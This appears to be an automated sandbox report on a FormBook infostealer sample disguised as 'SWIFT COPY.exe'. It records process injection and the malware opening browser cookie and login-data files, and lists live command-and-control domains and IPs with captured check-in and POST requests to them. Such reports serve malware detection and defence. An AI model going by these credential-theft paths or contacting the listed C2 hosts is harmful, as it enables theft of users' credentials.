                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 3.2.SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\finger.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 3.2.SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph: ID 1578068, Sample: SWIFT COPY.exe, Startdate: 19/12/2024, Architecture: WINDOWS, Score: 100]
                [Process chain in graph: SWIFT COPY.exe -> SWIFT COPY.exe (started) -> XwGiOcrCkQ.exe (injected) -> finger.exe (started) -> XwGiOcrCkQ.exe (injected), firefox.exe (started)]

                Source | Detection | Scanner | Label
                SWIFT COPY.exe | 35% | Virustotal |
                SWIFT COPY.exe | 63% | ReversingLabs | Win32.Backdoor.FormBook
                SWIFT COPY.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.smalleyes.icu | 134.122.191.187 | true | true | | unknown
www.pbfgm.xyz | 104.21.86.111 | true | true | | unknown
www.elinor.club | 194.58.112.174 | true | true | | unknown
www.phdcoach.pro | unknown | unknown | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
134.122.191.187 | www.smalleyes.icu | United States | 64050 | BCPL-SGBGPNETGlobalASNSG | true
104.21.86.111 | www.pbfgm.xyz | United States | 13335 | CLOUDFLARENETUS | true
194.58.112.174 | www.elinor.club | Russian Federation | 197695 | AS-REGRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578068
Start date and time: 2024-12-19 08:38:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SWIFT COPY.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@4/3
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 121
• Number of non-executed functions: 321
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
No simulations
                                                                                            • 194.87.189.43
                                                                                            Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                            • 194.87.189.43
                                                                                            cXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                            • 193.124.205.63
                                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.58.112.174
                                                                                            New Order.exeGet hashmaliciousFormBookBrowse
                                                                                            • 31.31.196.17
                                                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.58.112.174
                                                                                            No context
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\SWIFT COPY.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.34331486778365
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                            Process:C:\Windows\SysWOW64\finger.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):114688
                                                                                            Entropy (8bit):0.9746603542602881
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.678388051406651
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:SWIFT COPY.exe
                                                                                            File size:986'112 bytes
                                                                                            MD5:180a3e0827818592194c3a46dd8e9dd7
                                                                                            SHA1:fa90e6b8c4a962d3cb324cf23afe68845d6e5013
                                                                                            SHA256:b46e3f5fe8669966df0df40ef2ff40a1de2f8141da974f8058eb03c2897feacf
                                                                                            SHA512:837d3a0481469d9a5b0774ff48678cbce3f57e0375a72682b3cdb3092726e28d75fa6ec15ef12994e95c8b51ac845c49eb40eb9489fa2d5eca8b3b1f798e2eb2
                                                                                            SSDEEP:24576:tlAu2uO7lfceffJpwZs4U0IP6F4DB8lu2:tliu2l7BpeQ0x6E
                                                                                            TLSH:6325D0C03B29770ECD6DA931C53ADC7862642E787005B9D3ADDA2B977ACD1129E0CF91
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....fbg..............0......2........... ........@.. .......................`............@................................
                                                                                            Icon Hash:674d797961216d59
                                                                                            Entrypoint:0x4ef78e
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x67626619 [Wed Dec 18 06:05:13 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xef73c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf0000 | 0x2f48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xed794 | 0xed800 | aa6f5b7315b3d49639bc743889b26e21 | False | 0.8716683799342105 | data | 7.67844699512359 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf0000 | 0x2f48 | 0x3000 | 7ecf5514e07f31218a1d4a2a112742cb | False | 0.9449055989583334 | data | 7.740984197030074 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf4000 | 0xc | 0x200 | 949d0b30def62e7a7870d9d588e57bab | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf00e8 | 0x2bf4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9942232492001422
RT_GROUP_ICON | 0xf2cdc | 0x14 | data | | | 1.05
RT_VERSION | 0xf2cf0 | 0x258 | data | | | 0.49
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T08:39:48.421435+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49884 | 134.122.191.187 | 80 | TCP
2024-12-19T08:39:48.421435+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49884 | 134.122.191.187 | 80 | TCP
2024-12-19T08:40:53.098661+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49763 | 104.21.86.111 | 80 | TCP
2024-12-19T08:40:53.098661+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49763 | 104.21.86.111 | 80 | TCP
2024-12-19T08:41:18.792202+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49825 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:21.459881+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49831 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:24.187165+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49836 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:26.835082+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49845 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:26.835082+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49845 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:34.452861+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49863 | 134.122.191.187 | 80 | TCP
2024-12-19T08:41:37.124839+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49869 | 134.122.191.187 | 80 | TCP
2024-12-19T08:41:39.796635+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49875 | 134.122.191.187 | 80 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 08:40:51.060406923 CET | 192.168.2.4 | 1.1.1.1 | 0xcb4b | Standard query (0) | www.pbfgm.xyz | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:41:08.145827055 CET | 192.168.2.4 | 1.1.1.1 | 0x1b01 | Standard query (0) | www.phdcoach.pro | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:41:16.897948027 CET | 192.168.2.4 | 1.1.1.1 | 0x55a3 | Standard query (0) | www.elinor.club | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:41:31.847620964 CET | 192.168.2.4 | 1.1.1.1 | 0x4265 | Standard query (0) | www.smalleyes.icu | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 08:40:51.366868973 CET | 1.1.1.1 | 192.168.2.4 | 0xcb4b | No error (0) | www.pbfgm.xyz |  | 104.21.86.111 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:40:51.366868973 CET | 1.1.1.1 | 192.168.2.4 | 0xcb4b | No error (0) | www.pbfgm.xyz |  | 172.67.218.146 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:41:08.816263914 CET | 1.1.1.1 | 192.168.2.4 | 0x1b01 | Name error (3) | www.phdcoach.pro | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:41:17.338335991 CET | 1.1.1.1 | 192.168.2.4 | 0x55a3 | No error (0) | www.elinor.club |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:41:32.810414076 CET | 1.1.1.1 | 192.168.2.4 | 0x4265 | No error (0) | www.smalleyes.icu |  | 134.122.191.187 | A (IP address) | IN (0x0001) | false
                                                                                            • www.pbfgm.xyz
                                                                                            • www.elinor.club
                                                                                            • www.smalleyes.icu
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49763 | 104.21.86.111 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:40:51.510485888 CET | 539 | OUT | GET /fjd6/?Ir=beVfoldUF3/aok0FdWpvJC8HGsWBcAhapzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2FUvh8SZisD6hpiODREZagit+S+U5/mb9Z4=&M8Gl=KPotmx2p0n HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Host: www.pbfgm.xyz
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 19, 2024 08:40:53.098361969 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 19 Dec 2024 07:40:52 GMT
                                                                                            Content-Type: text/html
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPshYalhrtD9Y10kN9TS1MuLLXFbXNssi%2Bzcc2WGAEMAB8aplepjKd7Y%2BPmmZzy3ufoTrcjYhx1n0tEx9%2FLH3kLBFMi9CrejcvL4S8uOaj65j6HuXRYsd%2F5rzb%2BRU5L7"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f45bf3ba8c8ef9d-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1793&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frien
Dec 19, 2024 08:40:53.098515034 CET | 94 | IN
                                                                                            Data Ascii: dly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49825 | 194.58.112.174 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:41:17.476660013 CET | 803 | OUT | POST /1ne4/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.elinor.club
                                                                                            Origin: http://www.elinor.club
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.elinor.club/1ne4/
